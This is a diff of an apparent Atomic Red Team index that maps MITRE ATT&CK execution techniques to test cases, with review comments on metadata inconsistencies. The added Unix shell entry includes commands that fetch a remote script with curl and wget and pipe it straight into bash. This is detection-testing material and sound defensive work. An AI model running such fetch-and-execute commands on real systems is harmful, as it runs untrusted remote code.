@@ -39968,32 +41271,32 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T16:26:30.920Z'
+ modified: '2020-06-24T13:51:22.360Z'
created: '2020-03-09T13:48:55.078Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Praetorian
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - PowerShell logs
- - Loaded DLLs
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_remote_support: true
x_mitre_detection: |-
If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process monitoring
+ - Process command-line parameters
+ - PowerShell logs
+ - Loaded DLLs
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - Windows
identifier: T1059.001
atomic_tests:
- name: Mimikatz
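Review bot: `Windows Registry` is dropped from T1059.001's `x_mitre_data_sources` in favour of `Windows event logs`, yet the unchanged `x_mitre_detection` text on the new side still says an execution-policy change made "either through the Registry or at the command line" may be a way to detect malicious PowerShell use. Anyone deriving collection requirements from this index will no longer see Registry monitoring listed for a detection that depends on it. If the file tracks upstream ATT&CK data, this is an upstream inconsistency worth reporting; if it is hand-edited, either keep `- Windows Registry` in the list or reword the detection text so the two agree.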
@@ -40297,29 +41600,29 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:44:07.769Z'
+ modified: '2020-06-23T19:03:15.180Z'
created: '2020-03-09T14:38:24.334Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Python is installed.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_detection: |-
+ Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+
+ Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
x_mitre_data_sources:
- System calls
- Process monitoring
- Process command-line parameters
- API monitoring
- x_mitre_detection: |-
- Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
-
- Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_system_requirements:
- - Python is installed.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
T1053.005:
technique:
@@ -40368,13 +41671,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -40390,11 +41691,13 @@ execution:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -40533,19 +41836,18 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -40556,18 +41858,19 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1064:
technique:
@@ -40614,32 +41917,49 @@ execution:
phase_name: execution
modified: '2020-03-30T13:39:24.852Z'
created: '2017-05-31T21:30:51.733Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Data Execution Prevention
- - Exploit Prevention
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Process whitelisting
+ - Data Execution Prevention
+ - Exploit Prevention
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1569.002:
technique:
+ created: '2020-03-10T18:33:36.159Z'
+ modified: '2020-03-28T18:52:02.384Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
+ description: |-
+ Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).
+
+ [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
+
+ Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
+ name: Service Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1569.002
@@ -40652,23 +41972,6 @@ execution:
description: Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11.
Retrieved May 13, 2015.
source_name: Russinovich Sysinternals
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Execution
- description: |-
- Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).
-
- [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
-
- Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
- id: attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T18:52:02.384Z'
- created: '2020-03-10T18:33:36.159Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -40788,14 +42091,11 @@ execution:
phase_name: execution
modified: '2020-03-28T18:14:36.980Z'
created: '2017-05-31T21:31:40.542Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - API monitoring
- - DLL monitoring
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring DLL module loads may generate a significant amount
of data and may not be directly useful for defense unless collected under
specific circumstances, since benign use of Windows modules load functions
@@ -40807,11 +42107,14 @@ execution:
of other events with behavior surrounding module loads using API monitoring
and suspicious DLLs written to disk will provide additional context to an
event that may assist in determining if it is due to malicious behavior."
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - API monitoring
+ - DLL monitoring
+ - File monitoring
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_version: '2.0'
atomic_tests: []
T1072:
technique:
@@ -40838,17 +42141,16 @@ execution:
phase_name: lateral-movement
modified: '2020-02-21T16:31:32.789Z'
created: '2017-05-31T21:30:57.201Z'
- x_mitre_contributors:
- - Shane Tully, @securitygypsy
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ - Third-party application logs
+ - Windows Registry
+ - Process monitoring
+ - Process use of network
+ - Binary file metadata
x_mitre_detection: "Detection methods will vary depending on the type of third-party
software or system and how it is typically used. \n\nThe same investigation
process can be applied here as with other potentially malicious activities
@@ -40867,16 +42169,17 @@ execution:
application deployment at regular times so that irregular deployment activity
stands out. Monitor process activity that does not correlate to known good
software. Monitor account login activity on the deployment system."
- x_mitre_data_sources:
- - Authentication logs
- - File monitoring
- - Third-party application logs
- - Windows Registry
- - Process monitoring
- - Process use of network
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
+ x_mitre_contributors:
+ - Shane Tully, @securitygypsy
atomic_tests: []
T1153:
technique:
@@ -40904,23 +42207,23 @@ execution:
phase_name: execution
modified: '2020-03-30T13:40:14.512Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_detection: Monitor for command shell execution of source and subsequent
processes that are started as a result of being executed by a source command.
Adversaries must also drop a file to disk in order to execute it with source,
and these files can also detected by file monitoring.
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '2.0'
atomic_tests: []
T1569:
technique:
@@ -40942,50 +42245,148 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T19:01:50.128Z'
+ modified: '2020-06-08T23:28:29.250Z'
created: '2020-03-10T18:23:06.482Z'
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: Monitor for command line invocations of tools capable of
- modifying services that doesn’t correspond to normal usage patterns and known
- software, patch cycles, etc. Also monitor for changes to executables and other
- files associated with services. Changes to Windows services may also be reflected
- in the Registry.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor for command line invocations of tools capable of
+ modifying services that doesn’t correspond to normal usage patterns and known
+ software, patch cycles, etc. Also monitor for changes to executables and other
+ files associated with services. Changes to Windows services may also be reflected
+ in the Registry.
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
atomic_tests: []
- T1204:
+ T1059.004:
technique:
- id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: User Execution
+ id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
description: |-
- An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
+ Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
- While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- external_references:
- - source_name: mitre-attack
- external_id: T1204
- url: https://attack.mitre.org/techniques/T1204
+ Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+
+ Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
+ name: Unix Shell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.004
+ url: https://attack.mitre.org/techniques/T1059/004
+ - source_name: DieNet Bash
+ url: https://linux.die.net/man/1/bash
+ description: die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12,
+ 2020.
+ - source_name: Apple ZShell
+ url: https://support.apple.com/HT208050
+ description: Apple. (2020, January 28). Use zsh as the default shell on your
+ Mac. Retrieved June 12, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-11T14:55:56.315Z'
+ modified: '2020-06-15T16:55:44.483Z'
+ created: '2020-03-09T14:15:05.330Z'
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: "Unix shell usage may be common on administrator, developer,
+ or power user systems, depending on job function. If scripting is restricted
+ for normal users, then any attempt to enable scripts running on a system would
+ be considered suspicious. If scripts are not commonly used on a system, but
+ enabled, scripts running out of cycle from patching or other administrator
+ functions are suspicious. Scripts should be captured from the file system
+ when possible to determine their actions and intent.\n\nScripts are likely
+ to perform actions with various effects on a system that may generate events,
+ depending on the types of monitoring used. Monitor processes and command-line
+ arguments for script execution and subsequent behavior. Actions may be related
+ to network and system information discovery, collection, or other scriptable
+ post-compromise behaviors and could be used as indicators of detection leading
+ back to the source script. "
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1059.004
+ atomic_tests:
+ - name: Create and Execute Bash Shell Script
+ auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+ description: 'Creates and executes a simple bash script.
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ input_arguments:
+ script_path:
+ description: Script path
+ type: path
+ default: "/tmp/art.sh"
+ executor:
+ command: |
+ sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
+ sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
+ chmod +x #{script_path}
+ sh #{script_path}
+ cleanup_command: 'rm #{script_path}
+
+'
+ name: sh
+ - name: Command-Line Interface
+ auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
+ description: |
+ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
+
+ Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
+ supported_platforms:
+ - macos
+ - linux
+ executor:
+ command: |
+ curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+ wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+ cleanup_command: 'rm /tmp/art-fish.txt
+
+'
+ name: sh
+ T1204:
+ technique:
created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-03-11T14:55:56.315Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1204
+ url: https://attack.mitre.org/techniques/T1204
+ description: |-
+ An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
+
+ While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
+ name: User Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5
x_mitre_version: '1.2'
x_mitre_data_sources:
- Anti-virus
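Review bot: In the first T1059.004 atomic the `script_path` input argument is interpolated unquoted in the executor (`chmod +x #{script_path}`, `sh #{script_path}`, the two `sh -c` redirections and the `rm #{script_path}` cleanup), so overriding the default `/tmp/art.sh` with a path containing spaces or shell metacharacters breaks the test instead of exercising the technique; quoting the substitution, e.g. `chmod +x "#{script_path}"` and `sh "#{script_path}"` with cleanup `rm "#{script_path}"`, keeps the default behaviour and makes the argument safe to override. The description `Creates and executes a simple bash script.` also under-documents the observable behaviour a detection engineer needs up front — the generated script sends four ICMP echo requests to 8.8.8.8 — so suggest `Creates a shell script that echoes a marker line and pings 8.8.8.8 four times, then executes it with sh.`. The same description says "bash" while the executor runs the file with `sh` and is declared `name: sh`, so the wording and the exercised shell disagree. Since this index appears to be generated from the per-technique atomic YAML (the hunk itself references `atomics/T1059.004/`), these corrections presumably belong in that source file rather than here.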
@@ -41007,41 +42408,57 @@ execution:
atomic_tests: []
T1059.005:
technique:
+ id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
+ description: |-
+ Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
+
+ Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+
+ Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
+ name: Visual Basic
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1059.005
url: https://attack.mitre.org/techniques/T1059/005
+ - source_name: VB .NET Mar 2020
+ url: https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/
+ description: ".NET Team. (2020, March 11). Visual Basic support planned for
+ .NET 5.0. Retrieved June 23, 2020."
+ - source_name: VB Microsoft
+ url: https://docs.microsoft.com/dotnet/visual-basic/
+ description: Microsoft. (n.d.). Visual Basic documentation. Retrieved June
+ 23, 2020.
+ - source_name: Microsoft VBA
+ url: https://docs.microsoft.com/office/vba/api/overview/
+ description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June
+ 23, 2020.
- source_name: Microsoft VBScript
url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March
28, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: VBScript
- description: |-
- Adversaries may abuse VBScript scripts for execution. VBScript is a Windows scripting language modeled after the Visual Basic language, also known as Visual Basic for Applications (VBA).(Citation: Microsoft VBScript) VBScript is built on top of the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM), which allows it to interact with the environment. VBScript can also be used in place of JavaScript on webpages served to Internet Explorer, however, most modern browsers do not come with VBScript support.
-
- In a command-line environment, Cscript.exe is used to execute scripts. If a GUI is desired, Wscript.exe is used.
-
- Adversaries may abuse VBScript to execute malicious command and payloads. A common usage is embedding VBScript content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
- id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:34:02.708Z'
+ modified: '2020-06-25T03:32:51.046Z'
created: '2020-03-09T14:29:51.508Z'
x_mitre_platforms:
- Windows
+ - macOS
+ - Linux
x_mitre_data_sources:
- - Windows event logs
+ - DLL monitoring
+ - Loaded DLLs
+ - File monitoring
- Process monitoring
- Process command-line parameters
x_mitre_detection: |-
- Monitor for usage of Cscript.exe or Wscript.exe. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
- Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+ Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.
x_mitre_permissions_required:
- User
- Administrator
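Review bot: The T1059.005 entry now lists `macOS` and `Linux` under `x_mitre_platforms` (the two added lines after `- Windows`), but the updated `x_mitre_data_sources` (DLL monitoring, Loaded DLLs) and the new `x_mitre_detection` text describe only Windows telemetry — Windows Script Host (cscript.exe/wscript.exe), Office process spawning and `vbscript.dll` loads — so a defender reading this entry gets no detection guidance for the two newly listed platforms. The new detection text also carries a typo, `programable` → `programmable`. Both points appear to be carried over verbatim from the upstream ATT&CK STIX object (the `modified` timestamp and `x_mitre_*` fields track it), so if this file is generated from that feed the correction should be made upstream or in the generator rather than hand-edited here.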
@@ -41051,7 +42468,20 @@ execution:
atomic_tests: []
T1059.003:
technique:
- id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
+ created: '2020-03-09T14:12:31.196Z'
+ modified: '2020-03-28T17:02:13.722Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.003
+ url: https://attack.mitre.org/techniques/T1059/003
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Windows Command Shell
description: "Adversaries may abuse the Windows command shell for execution.
The Windows command shell (cmd.exe) is the primary command prompt
on Windows systems. The Windows command prompt can be used to control almost
@@ -41064,20 +42494,7 @@ execution:
commands and payloads. Common uses include cmd.exe /c to execute
a single command, or abusing cmd.exe interactively with input
and output forwarded over a command and control channel."
- name: Windows Command Shell
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
